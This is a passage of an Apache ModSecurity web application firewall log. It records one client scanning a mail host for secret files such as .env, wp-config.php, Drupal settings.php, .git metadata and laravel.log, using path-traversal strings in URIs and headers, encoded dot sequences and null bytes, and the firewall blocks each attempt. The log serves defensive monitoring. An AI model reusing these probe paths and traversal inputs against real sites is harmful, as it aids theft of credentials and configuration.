"OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKetM1tk6y7yBJLpJo5mAAAAI4"]
[Tue May 12 05:29:56.855839 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.247:57272] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKetM1tk6y7yBJLpJo5mAAAAI4"]
[Tue May 12 05:29:56.856020 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.247:57272] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKetM1tk6y7yBJLpJo5mAAAAI4"]
[Tue May 12 05:29:56.877345 2026] [security2:error] [pid 1808852:tid 1808866] [client 45.148.10.247:57312] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKesxfeipD4uoG21FowtwAAAAs"]
[Tue May 12 05:29:56.895336 2026] [core:error] [pid 1825287:tid 1825313] [client 45.148.10.247:57254] AH10244: invalid URI path (/storage/../../../.env)
[Tue May 12 05:29:56.920191 2026] [security2:error] [pid 1825179:tid 1825201] [client 45.148.10.247:57244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKes9r1yOh9TvizezifkgAAAEM"]
[Tue May 12 05:29:56.930860 2026] [security2:error] [pid 1808852:tid 1808866] [client 45.148.10.247:57312] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/config/.env"] [unique_id "agKetBfeipD4uoG21FowuwAAAAs"]
[Tue May 12 05:29:56.931075 2026] [security2:error] [pid 1808852:tid 1808866] [client 45.148.10.247:57312] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/config/.env"] [unique_id "agKetBfeipD4uoG21FowuwAAAAs"]
[Tue May 12 05:29:56.938589 2026] [security2:error] [pid 1825179:tid 1825201] [client 45.148.10.247:57244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKetNr1yOh9TvizezifkwAAAEM"]
[Tue May 12 05:29:56.938754 2026] [security2:error] [pid 1825179:tid 1825201] [client 45.148.10.247:57244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKetNr1yOh9TvizezifkwAAAEM"]
[Tue May 12 05:29:57.030915 2026] [security2:error] [pid 1842385:tid 1842399] [client 45.148.10.247:57286] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/sites/default/settings.php"] [unique_id "agKetRs7kySIUZ3ORnIl7gAAAQk"]
[Tue May 12 05:29:57.031127 2026] [security2:error] [pid 1842385:tid 1842399] [client 45.148.10.247:57286] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/sites/default/settings.php"] [unique_id "agKetRs7kySIUZ3ORnIl7gAAAQk"]
[Tue May 12 05:29:57.032529 2026] [security2:error] [pid 1844863:tid 1844880] [client 45.148.10.247:57280] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/v1/health"] [unique_id "agKetfaAnTZtx1_H_wy3ZQAAAUs"]
[Tue May 12 05:29:57.032572 2026] [security2:error] [pid 1844863:tid 1844880] [client 45.148.10.247:57280] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/v1/health"] [unique_id "agKetfaAnTZtx1_H_wy3ZQAAAUs"]
[Tue May 12 05:29:57.032597 2026] [security2:error] [pid 1844863:tid 1844880] [client 45.148.10.247:57280] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/v1/health"] [unique_id "agKetfaAnTZtx1_H_wy3ZQAAAUs"]
[Tue May 12 05:29:57.032777 2026] [security2:error] [pid 1844863:tid 1844880] [client 45.148.10.247:57280] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/api/v1/health"] [unique_id "agKetfaAnTZtx1_H_wy3ZQAAAUs"]
[Tue May 12 05:29:57.032835 2026] [security2:error] [pid 1844863:tid 1844880] [client 45.148.10.247:57280] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/api/v1/health"] [unique_id "agKetfaAnTZtx1_H_wy3ZQAAAUs"]
[Tue May 12 05:29:57.032871 2026] [security2:error] [pid 1844863:tid 1844880] [client 45.148.10.247:57280] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/api/v1/health"] [unique_id "agKetfaAnTZtx1_H_wy3ZQAAAUs"]
[Tue May 12 05:29:57.033257 2026] [security2:error] [pid 1844863:tid 1844880] [client 45.148.10.247:57280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/api/v1/health"] [unique_id "agKetfaAnTZtx1_H_wy3ZQAAAUs"]
[Tue May 12 05:29:57.319037 2026] [security2:error] [pid 1844863:tid 1844884] [client 45.148.10.247:57252] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php~"] [unique_id "agKetfaAnTZtx1_H_wy3ZwAAAU8"]
[Tue May 12 05:29:57.319243 2026] [security2:error] [pid 1844863:tid 1844884] [client 45.148.10.247:57252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php~"] [unique_id "agKetfaAnTZtx1_H_wy3ZwAAAU8"]
[Tue May 12 05:29:57.327418 2026] [core:error] [pid 1820198:tid 1820204] [client 45.148.10.247:57370] AH10244: invalid URI path (/%2e%2e/%2e%2e/.env)
[Tue May 12 05:29:57.348066 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.247:57380] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/storage/.env"] [unique_id "agKetc1tk6y7yBJLpJo5mwAAAIM"]
[Tue May 12 05:29:57.348267 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.247:57380] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/storage/.env"] [unique_id "agKetc1tk6y7yBJLpJo5mwAAAIM"]
[Tue May 12 05:29:57.351206 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.247:57240] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKeswgpmE1yW0glLdguFwAAANE"]
[Tue May 12 05:29:57.385850 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.247:57240] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKetQgpmE1yW0glLdguHwAAANE"]
[Tue May 12 05:29:57.386056 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.247:57240] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKetQgpmE1yW0glLdguHwAAANE"]
[Tue May 12 05:29:57.386237 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:57310] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.git/refs/heads/master"] [unique_id "agKetdr1yOh9TvizeziflQAAAEY"]
[Tue May 12 05:29:57.386380 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:57310] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.git/refs/heads/master"] [unique_id "agKetdr1yOh9TvizeziflQAAAEY"]
[Tue May 12 05:29:57.460177 2026] [security2:error] [pid 1844863:tid 1844885] [client 45.148.10.247:57258] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.gitignore"] [unique_id "agKetfaAnTZtx1_H_wy3aAAAAVA"]
[Tue May 12 05:29:57.460366 2026] [security2:error] [pid 1844863:tid 1844885] [client 45.148.10.247:57258] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.gitignore"] [unique_id "agKetfaAnTZtx1_H_wy3aAAAAVA"]
[Tue May 12 05:29:57.534690 2026] [security2:error] [pid 1842385:tid 1842404] [client 45.148.10.247:57326] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 20 - SQLI=0,XSS=0,RFI=0,LFI=20,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKesxs7kySIUZ3ORnIl6gAAAQ4"]
[Tue May 12 05:29:57.551861 2026] [security2:error] [pid 1842385:tid 1842404] [client 45.148.10.247:57326] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "mail.castiglionecf.com"] [uri "/storage/logs/laravel.log"] [unique_id "agKetRs7kySIUZ3ORnIl8AAAAQ4"]
[Tue May 12 05:29:57.552155 2026] [security2:error] [pid 1842385:tid 1842404] [client 45.148.10.247:57326] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/storage/logs/laravel.log"] [unique_id "agKetRs7kySIUZ3ORnIl8AAAAQ4"]
[Tue May 12 05:29:57.576975 2026] [security2:error] [pid 1825287:tid 1825312] [client 45.148.10.247:57334] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.git/refs/heads/main"] [unique_id "agKetQgpmE1yW0glLdguIQAAAMc"]
[Tue May 12 05:29:57.577176 2026] [security2:error] [pid 1825287:tid 1825312] [client 45.148.10.247:57334] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.git/refs/heads/main"] [unique_id "agKetQgpmE1yW0glLdguIQAAAMc"]
[Tue May 12 05:29:57.583130 2026] [security2:error] [pid 1808852:tid 1808855] [client 45.148.10.247:57348] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKetBfeipD4uoG21FowuQAAAAA"]
[Tue May 12 05:29:57.589017 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.148.10.247:57336] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/commit_editmsg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agKetRs7kySIUZ3ORnIl8QAAAQA"]
[Tue May 12 05:29:57.589206 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.148.10.247:57336] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agKetRs7kySIUZ3ORnIl8QAAAQA"]
